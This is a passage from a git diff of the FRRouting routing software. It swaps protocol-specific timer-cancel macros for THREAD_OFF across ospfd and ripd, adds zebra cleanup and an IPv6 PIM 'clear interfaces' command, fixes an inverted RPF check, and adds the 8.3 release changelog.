#define OSPF_NSM_TIMER_ON(T,F,V) thread_add_timer (master, (F), nbr, (V), &(T))
-/* Macro for OSPF NSM timer turn off. */
-#define OSPF_NSM_TIMER_OFF(X) thread_cancel(&(X))
-
/* Macro for OSPF NSM schedule event. */
#define OSPF_NSM_EVENT_SCHEDULE(N, E) \
thread_add_event(master, ospf_nsm_event, (N), (E), NULL)
diff --git a/ospfd/ospf_opaque.c b/ospfd/ospf_opaque.c
index 7e95cb591a..c7ac81d961 100644
--- a/ospfd/ospf_opaque.c
+++ b/ospfd/ospf_opaque.c
@@ -147,7 +147,7 @@ int ospf_opaque_type9_lsa_init(struct ospf_interface *oi)
void ospf_opaque_type9_lsa_term(struct ospf_interface *oi)
{
- OSPF_TIMER_OFF(oi->t_opaque_lsa_self);
+ THREAD_OFF(oi->t_opaque_lsa_self);
if (oi->opaque_lsa_self != NULL)
list_delete(&oi->opaque_lsa_self);
oi->opaque_lsa_self = NULL;
@@ -176,7 +176,7 @@ void ospf_opaque_type10_lsa_term(struct ospf_area *area)
area->lsdb->new_lsa_hook = area->lsdb->del_lsa_hook = NULL;
#endif /* MONITOR_LSDB_CHANGE */
- OSPF_TIMER_OFF(area->t_opaque_lsa_self);
+ THREAD_OFF(area->t_opaque_lsa_self);
if (area->opaque_lsa_self != NULL)
list_delete(&area->opaque_lsa_self);
return;
@@ -204,7 +204,7 @@ void ospf_opaque_type11_lsa_term(struct ospf *top)
top->lsdb->new_lsa_hook = top->lsdb->del_lsa_hook = NULL;
#endif /* MONITOR_LSDB_CHANGE */
- OSPF_TIMER_OFF(top->t_opaque_lsa_self);
+ THREAD_OFF(top->t_opaque_lsa_self);
if (top->opaque_lsa_self != NULL)
list_delete(&top->opaque_lsa_self);
return;
@@ -603,7 +603,7 @@ static void free_opaque_info_per_type(struct opaque_info_per_type *oipt,
ospf_opaque_lsa_flush_schedule(lsa);
}
- OSPF_TIMER_OFF(oipt->t_opaque_lsa_self);
+ THREAD_OFF(oipt->t_opaque_lsa_self);
list_delete(&oipt->id_list);
if (cleanup_owner) {
/* Remove from its owner's self-originated LSA list. */
@@ -711,7 +711,7 @@ static void free_opaque_info_per_id(void *val)
{
struct opaque_info_per_id *oipi = (struct opaque_info_per_id *)val;
- OSPF_TIMER_OFF(oipi->t_opaque_lsa_self);
+ THREAD_OFF(oipi->t_opaque_lsa_self);
if (oipi->lsa != NULL)
ospf_lsa_unlock(&oipi->lsa);
XFREE(MTYPE_OPAQUE_INFO_PER_ID, oipi);
diff --git a/ospfd/ospf_packet.c b/ospfd/ospf_packet.c
index c319f8068a..4b3f30a3f1 100644
--- a/ospfd/ospf_packet.c
+++ b/ospfd/ospf_packet.c
@@ -466,7 +466,7 @@ static void ospf_ls_req_timer(struct thread *thread)
void ospf_ls_req_event(struct ospf_neighbor *nbr)
{
- thread_cancel(&nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_req);
thread_add_event(master, ospf_ls_req_timer, nbr, 0, &nbr->t_ls_req);
}
@@ -4103,7 +4103,7 @@ static void ospf_ls_upd_queue_send(struct ospf_interface *oi,
* is actually turned off.
*/
if (list_isempty(oi->ospf->oi_write_q))
- OSPF_TIMER_OFF(oi->ospf->t_write);
+ THREAD_OFF(oi->ospf->t_write);
} else {
/* Hook thread to write packet. */
OSPF_ISM_WRITE_ON(oi->ospf);
diff --git a/ospfd/ospf_vty.c b/ospfd/ospf_vty.c
index 5bb65b6abc..1c22fad669 100644
--- a/ospfd/ospf_vty.c
+++ b/ospfd/ospf_vty.c
@@ -9748,7 +9748,7 @@ DEFUN (no_ospf_max_metric_router_lsa_startup,
for (ALL_LIST_ELEMENTS_RO(ospf->areas, ln, area)) {
SET_FLAG(area->stub_router_state,
OSPF_AREA_WAS_START_STUB_ROUTED);
- OSPF_TIMER_OFF(area->t_stub_router);
+ THREAD_OFF(area->t_stub_router);
/* Don't trample on admin stub routed */
if (!CHECK_FLAG(area->stub_router_state,
diff --git a/ospfd/ospfd.c b/ospfd/ospfd.c
index 33872950ac..8512b6a339 100644
--- a/ospfd/ospfd.c
+++ b/ospfd/ospfd.c
@@ -572,7 +572,7 @@ static struct ospf *ospf_lookup_by_name(const char *vrf_name)
static void ospf_deferred_shutdown_finish(struct ospf *ospf)
{
ospf->stub_router_shutdown_time = OSPF_STUB_ROUTER_UNCONFIGURED;
- OSPF_TIMER_OFF(ospf->t_deferred_shutdown);
+ THREAD_OFF(ospf->t_deferred_shutdown);
ospf_finish_final(ospf);
@@ -754,7 +754,7 @@ static void ospf_finish_final(struct ospf *ospf)
/* Clear static neighbors */
for (rn = route_top(ospf->nbr_nbma); rn; rn = route_next(rn))
if ((nbr_nbma = rn->info)) {
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -790,22 +790,22 @@ static void ospf_finish_final(struct ospf *ospf)
}
/* Cancel all timers. */
- OSPF_TIMER_OFF(ospf->t_read);
- OSPF_TIMER_OFF(ospf->t_write);
- OSPF_TIMER_OFF(ospf->t_spf_calc);
- OSPF_TIMER_OFF(ospf->t_ase_calc);
- OSPF_TIMER_OFF(ospf->t_maxage);
- OSPF_TIMER_OFF(ospf->t_maxage_walker);
- OSPF_TIMER_OFF(ospf->t_abr_task);
- OSPF_TIMER_OFF(ospf->t_asbr_check);
- OSPF_TIMER_OFF(ospf->t_asbr_nssa_redist_update);
- OSPF_TIMER_OFF(ospf->t_distribute_update);
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
- OSPF_TIMER_OFF(ospf->t_opaque_lsa_self);
- OSPF_TIMER_OFF(ospf->t_sr_update);
- OSPF_TIMER_OFF(ospf->t_default_routemap_timer);
- OSPF_TIMER_OFF(ospf->t_external_aggr);
- OSPF_TIMER_OFF(ospf->gr_info.t_grace_period);
+ THREAD_OFF(ospf->t_read);
+ THREAD_OFF(ospf->t_write);
+ THREAD_OFF(ospf->t_spf_calc);
+ THREAD_OFF(ospf->t_ase_calc);
+ THREAD_OFF(ospf->t_maxage);
+ THREAD_OFF(ospf->t_maxage_walker);
+ THREAD_OFF(ospf->t_abr_task);
+ THREAD_OFF(ospf->t_asbr_check);
+ THREAD_OFF(ospf->t_asbr_nssa_redist_update);
+ THREAD_OFF(ospf->t_distribute_update);
+ THREAD_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_opaque_lsa_self);
+ THREAD_OFF(ospf->t_sr_update);
+ THREAD_OFF(ospf->t_default_routemap_timer);
+ THREAD_OFF(ospf->t_external_aggr);
+ THREAD_OFF(ospf->gr_info.t_grace_period);
LSDB_LOOP (OPAQUE_AS_LSDB(ospf), rn, lsa)
ospf_discard_from_db(ospf, ospf->lsdb, lsa);
@@ -992,8 +992,8 @@ static void ospf_area_free(struct ospf_area *area)
free(IMPORT_NAME(area));
/* Cancel timer. */
- OSPF_TIMER_OFF(area->t_stub_router);
- OSPF_TIMER_OFF(area->t_opaque_lsa_self);
+ THREAD_OFF(area->t_stub_router);
+ THREAD_OFF(area->t_opaque_lsa_self);
if (OSPF_IS_AREA_BACKBONE(area))
area->ospf->backbone = NULL;
@@ -1428,7 +1428,7 @@ void ospf_ls_upd_queue_empty(struct ospf_interface *oi)
}
/* remove update event */
- thread_cancel(&oi->t_ls_upd_event);
+ THREAD_OFF(oi->t_ls_upd_event);
}
void ospf_if_update(struct ospf *ospf, struct interface *ifp)
@@ -1836,7 +1836,7 @@ int ospf_timers_refresh_set(struct ospf *ospf, int interval)
- (monotime(NULL) - ospf->lsa_refresher_started);
if (time_left > interval) {
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_lsa_refresher);
thread_add_timer(master, ospf_lsa_refresh_walker, ospf,
interval, &ospf->t_lsa_refresher);
}
@@ -1853,7 +1853,7 @@ int ospf_timers_refresh_unset(struct ospf *ospf)
- (monotime(NULL) - ospf->lsa_refresher_started);
if (time_left > OSPF_LSA_REFRESH_INTERVAL_DEFAULT) {
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_lsa_refresher);
ospf->t_lsa_refresher = NULL;
thread_add_timer(master, ospf_lsa_refresh_walker, ospf,
OSPF_LSA_REFRESH_INTERVAL_DEFAULT,
@@ -1905,7 +1905,7 @@ static void ospf_nbr_nbma_delete(struct ospf *ospf,
static void ospf_nbr_nbma_down(struct ospf_nbr_nbma *nbr_nbma)
{
- OSPF_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -2094,7 +2094,7 @@ int ospf_nbr_nbma_poll_interval_set(struct ospf *ospf, struct in_addr nbr_addr,
if (nbr_nbma->v_poll != interval) {
nbr_nbma->v_poll = interval;
if (nbr_nbma->oi && ospf_if_is_up(nbr_nbma->oi)) {
- OSPF_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
OSPF_POLL_TIMER_ON(nbr_nbma->t_poll, ospf_poll_timer,
nbr_nbma->v_poll);
}
@@ -2263,7 +2263,7 @@ static int ospf_vrf_disable(struct vrf *vrf)
if (IS_DEBUG_OSPF_EVENT)
zlog_debug("%s: ospf old_vrf_id %d unlinked", __func__,
old_vrf_id);
- thread_cancel(&ospf->t_read);
+ THREAD_OFF(ospf->t_read);
close(ospf->fd);
ospf->fd = -1;
}
diff --git a/ospfd/ospfd.h b/ospfd/ospfd.h
index 401a89fa38..8478c96ddc 100644
--- a/ospfd/ospfd.h
+++ b/ospfd/ospfd.h
@@ -647,8 +647,6 @@ struct ospf_nbr_nbma {
#define OSPF_TIMER_ON(T,F,V) thread_add_timer (master,(F),ospf,(V),&(T))
#define OSPF_AREA_TIMER_ON(T,F,V) thread_add_timer (master, (F), area, (V), &(T))
#define OSPF_POLL_TIMER_ON(T,F,V) thread_add_timer (master, (F), nbr_nbma, (V), &(T))
-#define OSPF_POLL_TIMER_OFF(X) OSPF_TIMER_OFF((X))
-#define OSPF_TIMER_OFF(X) thread_cancel(&(X))
/* Extern variables. */
extern struct ospf_master *om;
diff --git a/pathd/path_zebra.c b/pathd/path_zebra.c
index 156267a394..a98532cc39 100644
--- a/pathd/path_zebra.c
+++ b/pathd/path_zebra.c
@@ -352,3 +352,9 @@ void path_zebra_init(struct thread_master *master)
/* Connect to the LM. */
path_zebra_label_manager_connect();
}
+
+void path_zebra_stop(void)
+{
+ zclient_stop(zclient);
+ zclient_free(zclient);
+}
diff --git a/pathd/path_zebra.h b/pathd/path_zebra.h
index 42a7123dd4..683fcf10f7 100644
--- a/pathd/path_zebra.h
+++ b/pathd/path_zebra.h
@@ -30,5 +30,6 @@ void path_zebra_delete_sr_policy(struct srte_policy *policy);
int path_zebra_request_label(mpls_label_t label);
void path_zebra_release_label(mpls_label_t label);
void path_zebra_init(struct thread_master *master);
+void path_zebra_stop(void);
#endif /* _FRR_PATH_MPLS_H_ */
diff --git a/pathd/pathd.c b/pathd/pathd.c
index be2cfe8b01..e9d7cc6fc7 100644
--- a/pathd/pathd.c
+++ b/pathd/pathd.c
@@ -510,6 +510,8 @@ void srte_clean_zebra(void)
RB_FOREACH_SAFE (policy, srte_policy_head, &srte_policies, safe_pol)
srte_policy_del(policy);
+
+ path_zebra_stop();
}
/**
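The two pathd hunks above wire shutdown together: srte_clean_zebra() deletes every SR-TE policy and then calls the new path_zebra_stop(), which releases the zebra client. A sketch of the resulting teardown order, using only names taken from these hunks:

    void srte_clean_zebra(void)
    {
            struct srte_policy *policy, *safe_pol;

            RB_FOREACH_SAFE (policy, srte_policy_head, &srte_policies, safe_pol)
                    srte_policy_del(policy);

            /* release the zebra client last, after all policies are gone */
            path_zebra_stop();      /* zclient_stop(zclient); zclient_free(zclient); */
    }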
diff --git a/pimd/mtracebis_netlink.c b/pimd/mtracebis_netlink.c
index 47b5f7e52c..fe2cb56a26 100644
--- a/pimd/mtracebis_netlink.c
+++ b/pimd/mtracebis_netlink.c
@@ -187,16 +187,18 @@ int rtnl_dump_filter_l(struct rtnl_handle *rth,
const struct rtnl_dump_filter_arg *arg)
{
struct sockaddr_nl nladdr;
- struct iovec iov;
+ char buf[16384];
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = sizeof(buf),
+ };
struct msghdr msg = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
- char buf[16384];
- iov.iov_base = buf;
while (1) {
int status;
const struct rtnl_dump_filter_arg *a;
@@ -220,7 +222,7 @@ int rtnl_dump_filter_l(struct rtnl_handle *rth,
}
for (a = arg; a->filter; a++) {
- struct nlmsghdr *h = (struct nlmsghdr *)buf;
+ struct nlmsghdr *h = (struct nlmsghdr *)iov.iov_base;
msglen = status;
while (NLMSG_OK(h, (uint32_t)msglen)) {
@@ -348,7 +350,8 @@ int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n, pid_t peer,
msg.msg_namelen);
exit(1);
}
- for (h = (struct nlmsghdr *)buf; status >= (int)sizeof(*h);) {
+ for (h = (struct nlmsghdr *)iov.iov_base;
+ status >= (int)sizeof(*h);) {
int err;
int len = h->nlmsg_len;
int l = len - sizeof(*h);
@@ -421,21 +424,23 @@ int rtnl_listen(struct rtnl_handle *rtnl, rtnl_filter_t handler, void *jarg)
int status;
struct nlmsghdr *h;
struct sockaddr_nl nladdr;
- struct iovec iov;
+ char buf[8192];
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = sizeof(buf),
+ };
struct msghdr msg = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
- char buf[8192];
memset(&nladdr, 0, sizeof(nladdr));
nladdr.nl_family = AF_NETLINK;
nladdr.nl_pid = 0;
nladdr.nl_groups = 0;
- iov.iov_base = buf;
while (1) {
iov.iov_len = sizeof(buf);
status = recvmsg(rtnl->fd, &msg, 0);
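Both netlink hunks above apply the same fix: the receive buffer is declared before the iovec, and the iovec gets designated initializers so iov_base and iov_len are already valid at the point of declaration. A minimal sketch of the pattern, reusing the names from the hunk above and assuming the usual socket/netlink includes:

    char buf[8192];
    struct iovec iov = {
            .iov_base = buf,
            .iov_len = sizeof(buf),
    };
    struct msghdr msg = {
            .msg_name = &nladdr,
            .msg_namelen = sizeof(nladdr),
            .msg_iov = &iov,
            .msg_iovlen = 1,
    };

    /* iov_len is re-armed on every pass of the receive loop, as in the
     * context above, since recvmsg() does not reset it. */
    iov.iov_len = sizeof(buf);
    status = recvmsg(rtnl->fd, &msg, 0);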
diff --git a/pimd/pim6_cmd.c b/pimd/pim6_cmd.c
index b7a832681d..d72a67243b 100644
--- a/pimd/pim6_cmd.c
+++ b/pimd/pim6_cmd.c
@@ -1309,6 +1309,25 @@ DEFPY (clear_ipv6_mroute_count,
return clear_ip_mroute_count_command(vty, name);
}
+DEFPY (clear_ipv6_pim_interfaces,
+ clear_ipv6_pim_interfaces_cmd,
+ "clear ipv6 pim [vrf NAME] interfaces",
+ CLEAR_STR
+ IPV6_STR
+ CLEAR_IP_PIM_STR
+ VRF_CMD_HELP_STR
+ "Reset PIM interfaces\n")
+{
+ struct vrf *v = pim_cmd_lookup(vty, vrf);
+
+ if (!v)
+ return CMD_WARNING;
+
+ clear_pim_interfaces(v->info);
+
+ return CMD_SUCCESS;
+}
+
DEFPY (clear_ipv6_pim_bsr_db,
clear_ipv6_pim_bsr_db_cmd,
"clear ipv6 pim [vrf NAME] bsr-data",
@@ -1599,6 +1618,7 @@ void pim_cmd_init(void)
install_element(ENABLE_NODE, &clear_ipv6_pim_oil_cmd);
install_element(ENABLE_NODE, &clear_ipv6_mroute_count_cmd);
install_element(ENABLE_NODE, &clear_ipv6_pim_bsr_db_cmd);
+ install_element(ENABLE_NODE, &clear_ipv6_pim_interfaces_cmd);
install_element(ENABLE_NODE, &debug_pimv6_cmd);
install_element(ENABLE_NODE, &debug_pimv6_nht_cmd);
diff --git a/pimd/pim_cmd.c b/pimd/pim_cmd.c
index f62b90a9d6..9681493808 100644
--- a/pimd/pim_cmd.c
+++ b/pimd/pim_cmd.c
@@ -1521,17 +1521,6 @@ static void clear_igmp_interfaces(struct pim_instance *pim)
pim_if_addr_add_all(ifp);
}
-static void clear_pim_interfaces(struct pim_instance *pim)
-{
- struct interface *ifp;
-
- FOR_ALL_INTERFACES (pim->vrf, ifp) {
- if (ifp->info) {
- pim_neighbor_delete_all(ifp, "interface cleared");
- }
- }
-}
-
static void clear_interfaces(struct pim_instance *pim)
{
clear_igmp_interfaces(pim);
@@ -1670,7 +1659,7 @@ DEFPY (clear_ip_mroute,
return CMD_SUCCESS;
}
-DEFUN (clear_ip_pim_interfaces,
+DEFPY (clear_ip_pim_interfaces,
clear_ip_pim_interfaces_cmd,
"clear ip pim [vrf NAME] interfaces",
CLEAR_STR
@@ -1679,13 +1668,12 @@ DEFUN (clear_ip_pim_interfaces,
VRF_CMD_HELP_STR
"Reset PIM interfaces\n")
{
- int idx = 2;
- struct vrf *vrf = pim_cmd_lookup_vrf(vty, argv, argc, &idx);
+ struct vrf *v = pim_cmd_lookup(vty, vrf);
- if (!vrf)
+ if (!v)
return CMD_WARNING;
- clear_pim_interfaces(vrf->info);
+ clear_pim_interfaces(v->info);
return CMD_SUCCESS;
}
diff --git a/pimd/pim_cmd_common.c b/pimd/pim_cmd_common.c
index f2974edae2..b7bd7375c5 100644
--- a/pimd/pim_cmd_common.c
+++ b/pimd/pim_cmd_common.c
@@ -4902,3 +4902,13 @@ int pim_show_interface_traffic_helper(const char *vrf, const char *if_name,
return CMD_SUCCESS;
}
+
+void clear_pim_interfaces(struct pim_instance *pim)
+{
+ struct interface *ifp;
+
+ FOR_ALL_INTERFACES (pim->vrf, ifp) {
+ if (ifp->info)
+ pim_neighbor_delete_all(ifp, "interface cleared");
+ }
+}
diff --git a/pimd/pim_cmd_common.h b/pimd/pim_cmd_common.h
index 1e770e6c8d..02acb16858 100644
--- a/pimd/pim_cmd_common.h
+++ b/pimd/pim_cmd_common.h
@@ -184,6 +184,7 @@ void pim_show_interface_traffic(struct pim_instance *pim, struct vty *vty,
bool uj);
int pim_show_interface_traffic_helper(const char *vrf, const char *if_name,
struct vty *vty, bool uj);
+void clear_pim_interfaces(struct pim_instance *pim);
/*
* Special Macro to allow us to get the correct pim_instance;
*/
diff --git a/pimd/pim_iface.c b/pimd/pim_iface.c
index 73b6ca951a..0fb5e8c6d9 100644
--- a/pimd/pim_iface.c
+++ b/pimd/pim_iface.c
@@ -801,22 +801,13 @@ void pim_if_addr_add_all(struct interface *ifp)
pim_if_addr_add(ifc);
}
- if (!v4_addrs && v6_addrs && !if_is_loopback(ifp)) {
- if (pim_ifp->pim_enable) {
-
- /* Interface has a valid primary address ? */
- if (!pim_addr_is_any(pim_ifp->primary_address)) {
-
- /* Interface has a valid socket ? */
- if (pim_ifp->pim_sock_fd < 0) {
- if (pim_sock_add(ifp)) {
- zlog_warn(
- "Failure creating PIM socket for interface %s",
- ifp->name);
- }
- }
- }
- } /* pim */
+ if (!v4_addrs && v6_addrs && !if_is_loopback(ifp) &&
+ pim_ifp->pim_enable && !pim_addr_is_any(pim_ifp->primary_address) &&
+ pim_ifp->pim_sock_fd < 0 && pim_sock_add(ifp)) {
+ /* Interface has a valid primary address ? */
+ /* Interface has a valid socket ? */
+ zlog_warn("Failure creating PIM socket for interface %s",
+ ifp->name);
}
/*
* PIM or IGMP is enabled on interface, and there is at least one
@@ -1768,9 +1759,7 @@ static int pim_ifp_down(struct interface *ifp)
if (ifp->info) {
pim_if_del_vif(ifp);
-#if PIM_IPV == 4
pim_ifstat_reset(ifp);
-#endif
}
return 0;
diff --git a/pimd/pim_nht.c b/pimd/pim_nht.c
index 2e5c0598c0..9feb064e96 100644
--- a/pimd/pim_nht.c
+++ b/pimd/pim_nht.c
@@ -436,7 +436,7 @@ static int pim_update_upstream_nh_helper(struct hash_bucket *bucket, void *arg)
* RPF nbr is now unreachable the MFC has already been updated
* by pim_rpf_clear
*/
- if (rpf_result != PIM_RPF_CHANGED)
+ if (rpf_result == PIM_RPF_CHANGED)
pim_upstream_mroute_iif_update(up->channel_oil, __func__);
if (rpf_result == PIM_RPF_CHANGED ||
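The pim_nht.c change above is a one-character logic fix: the old guard skipped pim_upstream_mroute_iif_update() exactly when the RPF lookup reported a change, which (per the comment retained above) is the case the update is meant to cover; the unreachable-neighbor case is already handled by pim_rpf_clear. Side-by-side sketch using only identifiers from the hunk:

    /* before (bug): updated the IIF for every result except a change */
    if (rpf_result != PIM_RPF_CHANGED)
            pim_upstream_mroute_iif_update(up->channel_oil, __func__);

    /* after: update the IIF only when the RPF neighbor actually changed */
    if (rpf_result == PIM_RPF_CHANGED)
            pim_upstream_mroute_iif_update(up->channel_oil, __func__);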
diff --git a/redhat/frr.spec.in b/redhat/frr.spec.in
index 135c065b15..c94785ec01 100644
--- a/redhat/frr.spec.in
+++ b/redhat/frr.spec.in
@@ -795,7 +795,128 @@ sed -i 's/ -M rpki//' %{_sysconfdir}/frr/daemons
%changelog
-* Tue Jun 7 2022 Donatas Abraitis <donatas@opensourcerouting.org> - %{version}
+
+* Wed Jul 20 2022 Martin Winter <mwinter@opensourcerouting.org> - %{version}
+
+* Wed Jul 13 2022 Jafar Al-Gharaibeh <jafar@atcorp.com> - 8.3
+- General:
+- Add camelCase JSON keys in addition to PascalCase (wrong JSON keys will be deprecated)
+- Fix corruption when route-map delete/add sequence happens (fast re-add)
+- Reworked gRPC
+- RFC5424 & journald extended syslog target
+- bfdd:
+- Fix broken FSM in active/passive modes
+- bgpd:
+- Notification Message Support for BGP Graceful Restart (rfc8538)
+- BGP Cease Notification Subcode For BFD
+- Send Hold Timer for BGP (own implementation without an additional knob)
+- New `set as-path replace` command for BGP route-map
+- New `match peer` command for BGP route-map
+- New `ead-es-frag evi-limit` command for EVPN
+- New `match evpn route-type` command for EVPN route-map to match Type-1/Type-4
+- JSON outputs for all RPKI show commands
+- Set attributes via route-map for BGP conditional advertisements
+- Pass non-transitive extended communities between RS and RS-clients
+- Send MED attribute when aggregate prefix is created
+- Fix aspath memory leak in aggr_suppress_map_test
+- Fix crash for `show ip bgp vrf all all neighbors 192.168.0.1 ...`
+- Fix crash for `show ip bgp vrf all all`
+- Fix memory leak for BGP Community Alias in CLI
+- Fix memory leak when setting BGP community at egress
+- Fix memory leak when setting BGP large-community at egress
+- Fix SR color nexthop processing in BGP
+- Fix setting local-preference in route-map using +/-
+- Fix crash using Lua and route-map to set attributes via scripts
+- Fix crash when issuing various forms of `bgp no-rib`
+- isisd:
+- JSON output for show summary command
+- Fix crash when MTU mismatch occurs
+- Fix crash with xfrm interface type
+- Fix infinite loop when parsing LSPs
+- Fix router capability TLV parsing issues
+- vtysh:
+- New `show thread timers` command
+- ospf6d:
+- Add LSA statistics to LSA database
+- Add LSA stats to `show area json` output
+- Show time left in hello timer for `show ipv6 ospf6 int`
+- Restart SPF when distance is updated
+- Support keychain for ospf6 authentication
+- ospfd:
+- New `show ip ospf reachable-routers` command
+- Restart SPF when distance is updated
+- Use consistent JSON keys for `show ip ospf neighbor` and detail version
+- pimd:
+- Add additional IGMP stats
+- Add IGMP join sent/failed statistics
+- Add IGMP total groups and total source groups to statistics
+- New `debug igmp trace detail` command
+- New `ip pim passive` command
+- JSON support added for command `show ip igmp sources`
+- Allow the LPM match to work properly with prefix lists and normal RPs
+- Do not allow 224.0.0.0/24 range in IGMP join
+- Fix IGMP packet/query check
+- Handle PIM join/prune receive flow for IPv6
+- Handle receive of (*,G) register stop with source address as 0
+- Handle exclude-mode IGMPv3 report messages for SSM-aware groups
+- Handle IGMPv2 report messages for SSM-aware group range
+- Send immediate join with possible sg rpt prune bit set
+- Show group-type under `show ip pim rp-info`
+- Show total received messages IGMP stats
+- staticd:
+- Capture zebra advertised ECMP limit
+- Do not register existing nexthop to Zebra
+- Reject route config with too many nexthops
+- Track nexthops per-safi
+- watchfrr:
+- Add some more information to `show watchfrr`
+- Send operational state to systemd
+- zebra:
+- Add ability to know when FRR is not ASIC offloaded
+- Add command for setting protodown bit
+- Add dplane type for netconf data
+- Add ECMP supported to `show zebra`
+- Add EVPN status to `show zebra`
+- Add if v4/v6 forwarding is turned on/off to `show zebra`
+- Add initial zebra tracepoint support
+- Add kernel nexthop group support to `show zebra`
+- Add knowledge about ra and rfc 5549 to `show zebra`
+- Add mpls status to `show zebra`
+- Add netlink debug dump for netconf messages
+- Add netlink debugs for ip rules
+- Add OS and version to `show zebra`
+- Add support for end.dt4
+- Add to `show zebra` the type of vrf devices being used
+- Allow *BSD to specify a receive buffer size
+- Allow multiple connected routes to be chosen for kernel routes
+- Allow system routes to recurse through themselves
+- Do not send RAs w/o link-local v6 or on bridge-ports
+- Evpn disable remove l2vni from l3vni list
+- Evpn-mh bonds protodown check for set
+- Evpn-mh use protodown update reason api
+- Fix cleanup of meta queues on vrf disable
+- Fix crash in evpn neigh cleanup all
+- Fix missing delete vtep during vni transition
+- Fix missing vrf change of l2vni on vxlan interface
+- Fix rtadv startup when config read in is before interface up
+- Fix use after deletion event in FreeBSD
+- Fix v6 route replace failure turned into success
+- Get zebra graceful restart working when restarting on *BSD
+- Handle FreeBSD routing socket enobufs
+- Handle protodown netlink for vxlan device
+- Include mpls enabled status in interface output
+- Include old reason in evpn-mh bond update
+- Keep the interface flags safe on multiple ioctl calls
+- Let /32 host route with same ip cross vrf
+- Make router advertisement warnings show up once every 6 hours
+- Prevent crash if zebra_route_all is used for a route type
+- Prevent installation of connected multiple times
+- Protodown-up event trigger interface up
+- Register nht nexthops with proper safi
+- Update advertise-svi-ip macips w/ new mac
+- When handling unprocessed messages from kernel print usable string
+- New `show ip nht mrib` command
+- Handle ENOBUFS errors for FreeBSD
* Tue Mar 1 2022 Jafar Al-Gharaibeh <jafar@atcorp.com> - 8.2
- The FRRouting community would like to announce FRR Release 8.2.
diff --git a/ripd/rip_interface.c b/ripd/rip_interface.c
index 7ac37b7ee2..02da56e4f3 100644
--- a/ripd/rip_interface.c
+++ b/ripd/rip_interface.c
@@ -428,7 +428,7 @@ static void rip_interface_clean(struct rip_interface *ri)
ri->enable_interface = 0;
ri->running = 0;
- thread_cancel(&ri->t_wakeup);
+ THREAD_OFF(ri->t_wakeup);
}
void rip_interfaces_clean(struct rip *rip)
diff --git a/ripd/rip_nb_rpcs.c b/ripd/rip_nb_rpcs.c
index 52f2985cb3..25641f2f79 100644
--- a/ripd/rip_nb_rpcs.c
+++ b/ripd/rip_nb_rpcs.c
@@ -64,8 +64,8 @@ static void clear_rip_route(struct rip *rip)
}
if (rinfo) {
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
rip_info_free(rinfo);
}
diff --git a/ripd/rip_peer.c b/ripd/rip_peer.c
index 8febb436e7..a52914bcf9 100644
--- a/ripd/rip_peer.c
+++ b/ripd/rip_peer.c
@@ -38,7 +38,7 @@ static struct rip_peer *rip_peer_new(void)
static void rip_peer_free(struct rip_peer *peer)
{
- RIP_TIMER_OFF(peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
XFREE(MTYPE_RIP_PEER, peer);
}
@@ -84,7 +84,7 @@ static struct rip_peer *rip_peer_get(struct rip *rip, struct in_addr *addr)
peer = rip_peer_lookup(rip, addr);
if (peer) {
- thread_cancel(&peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
} else {
peer = rip_peer_new();
peer->rip = rip;
diff --git a/ripd/ripd.c b/ripd/ripd.c
index cc21c0bd69..9798186036 100644
--- a/ripd/ripd.c
+++ b/ripd/ripd.c
@@ -144,7 +144,7 @@ static void rip_garbage_collect(struct thread *t)
rinfo = THREAD_ARG(t);
/* Off timeout timer. */
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Get route_node pointer. */
rp = rinfo->rp;
@@ -226,14 +226,14 @@ struct rip_info *rip_ecmp_replace(struct rip *rip, struct rip_info *rinfo_new)
if (tmp_rinfo == rinfo)
continue;
- RIP_TIMER_OFF(tmp_rinfo->t_timeout);
- RIP_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
rip_info_free(tmp_rinfo);
}
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, rinfo_new, sizeof(struct rip_info));
if (rip_route_rte(rinfo)) {
@@ -262,12 +262,12 @@ struct rip_info *rip_ecmp_delete(struct rip *rip, struct rip_info *rinfo)
struct route_node *rp = rinfo->rp;
struct list *list = (struct list *)rp->info;
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
if (listcount(list) > 1) {
/* Some other ECMP entries still exist. Just delete this entry.
*/
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
if (rip_route_rte(rinfo)
&& CHECK_FLAG(rinfo->flags, RIP_RTF_FIB))
@@ -313,7 +313,7 @@ static void rip_timeout(struct thread *t)
static void rip_timeout_update(struct rip *rip, struct rip_info *rinfo)
{
if (rinfo->metric != RIP_METRIC_INFINITY) {
